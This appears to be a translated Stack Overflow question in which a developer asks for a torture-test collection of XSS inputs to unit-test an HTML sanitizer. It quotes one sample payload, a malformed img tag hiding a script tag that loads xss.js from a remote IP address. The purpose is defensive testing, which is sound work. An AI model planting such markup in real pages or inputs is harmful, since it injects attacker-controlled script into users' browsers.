Jam*_*ady 18 testing xss user-input
我正在寻找一个html杀菌剂,显然要测试/证明它正常工作,我需要一组XSS示例来反对它以了解它的表现.这是Coding Horror的一个很好的例子
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
我知道有一个Mime酷刑测试,其中包含几个带有附件的嵌套电子邮件,这些附件用于测试Mime解码器(如果他们能够正确解码它们,那么它们已被证明有效).我基本上都在为XSS寻找一个等效的,即一个狡猾的html示例列表,我可以把它放在我的杀菌剂上,以确保它正常工作.
如果有人也有任何关于如何编写杀菌剂的好资源(即人们试图使用的常见漏洞等),他们也会感激不尽.
提前致谢 :-)
编辑:对不起,如果以前不清楚,但我是经过一系列酷刑测试,所以我可以为杀菌剂编写单元测试,而不是在浏览器中测试等等.理论上的源数据可能来自任何地方 - 不只是一个浏览器.
| 归档时间: |
|
| 查看次数: |
3716 次 |
| 最近记录: |